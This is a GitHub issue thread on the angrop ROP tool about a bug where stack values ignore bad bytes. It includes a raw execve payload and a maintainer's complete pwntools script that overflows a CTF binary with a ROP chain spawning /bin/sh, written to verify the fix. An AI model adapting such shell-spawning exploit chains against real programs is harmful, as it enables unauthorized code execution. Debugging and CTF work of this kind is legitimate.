search

angr / angrop

BSD 2-Clause "Simplified" License
589 stars 69 forks source link

Values passed on stack ignoring badbytes #29

Closed redfast00 closed 2 years ago

redfast00 commented 5 years ago 
import angr, angrop
p = angr.Project("bronze_ropchain")
rop = p.analyses.ROP()
rop.set_badbytes([0x0, 0x0a])
rop.find_gadgets()
rop.execve().payload_str()
> b'\xb4d\x05\x08\xc9bin\xbc\xcf\r\x08\x00\x00\x00\x00\xc7a\x06\x08\xb4d\x05\x08\xc9sh\x00\xc0\xcf\r\x08\x00\x00\x00\x00\xc7a\x06\x08\x9c\x89\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xcf\r\x08\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00`\xf8\x06\x08'
redfast00 commented 5 years ago

rop.set_regs(eax=0).payload_str() also includes the bad bytes. Maybe there is no constraint added for the values on the stack that will be popped?

github-actions[bot] commented 2 years ago

This issue has been marked as stale because it has no recent activity. Please comment or add the pinned tag to prevent this issue from being closed.

redfast00 commented 2 years ago

is this issue fixed?

github-actions[bot] commented 2 years ago

This issue has been marked as stale because it has no recent activity. Please comment or add the pinned tag to prevent this issue from being closed.

redfast00 commented 2 years ago

is this issue fixed?

Kyle-Kyle commented 2 years ago

I think I refactored angrop's badbyte handling mechanism once and it should be fixed. Do you think you can still find the binary and share it here so that we can make sure it is actually fixed? @redfast00

Kyle-Kyle commented 2 years ago

^ that happened in early 2021 iirc

redfast00 commented 2 years ago

I think it's https://github.com/JustBeYou/ctfs/blob/master/redpwn/bronze_ropchain

Kyle-Kyle commented 2 years ago

I have used angrop to generate a working ropchain using your script. The exploitation script is this:

from pwn import *

chain = b""
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0x6e69622f)
chain += p32(0x80d9f51)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806ef4c) # adc eax, 0x10; pop edx; pop ecx; pop ebx; ret
chain += p32(0xff68732f)
chain += p32(0x80d9f55)
chain += p32(0xf5f5f5f5)
chain += p32(0x80501d0) # mov dword ptr [ecx + 0xb0], edx; ret
chain += p32(0x806274c) # lea esi, [esi]; xor eax, eax; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x80da008)
chain += p32(0x8066d62) # mov byte ptr [edx], al; mov eax, edx; ret
chain += p32(0x8092016) # mov eax, 8; pop edi; ret
chain += p32(0xf5f5f5f5)
chain += p32(0x8092d7b) # mov edi, 0; add eax, 3; ret
chain += p32(0x80ce6b5) # pop edx; ret
chain += p32(0x8048008)
chain += p32(0x806ef52) # pop ecx; pop ebx; ret
chain += p32(0x8048008)
chain += p32(0x80da001)
chain += p32(0x806f860) # int 0x80

#r = gdb.debug("./bronze_ropchain")
r = process("./bronze_ropchain")
r.sendlineafter(b"name?", b'A'*28+chain)
r.interactive(

the patch is pending.